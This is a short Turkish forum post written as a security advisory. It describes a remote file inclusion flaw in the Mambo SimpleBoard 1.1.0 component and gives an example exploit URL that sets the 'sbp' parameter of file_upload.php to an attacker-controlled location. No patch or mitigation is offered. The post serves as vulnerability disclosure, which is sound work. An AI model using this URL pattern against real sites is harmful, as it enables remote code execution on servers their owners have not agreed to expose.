OP Yıllanmış Üye
Teşekkür Sayısı: 0
169 mesaj
Kayıt Tarihi:Kayıt: Şub 2006
Risk: Yüksek
Etki: Uzaktan kod çalıştırma
Etkilenenler : Simpleboard-1.1.0-Stable
Bilgi : Popüler yazilimlardan birisi olan Mambo SimpleBoard'da require_once("$sbp/sb_helpers.php"); parametresinde meydana gelen güvenlik zaafiyatını hacker'lar ve security advisory'ler sömürüyorlar. uzaktan kod çalıştırma olanağı veren bu açık şu şekilde kullaniliyor;
Örnek :
http://[hedefsite]/[path]/components/ components/com_simpleboard/file_upload.php?sbp=[OwnerbyOnur]
Security Adivosry Onur OKTAY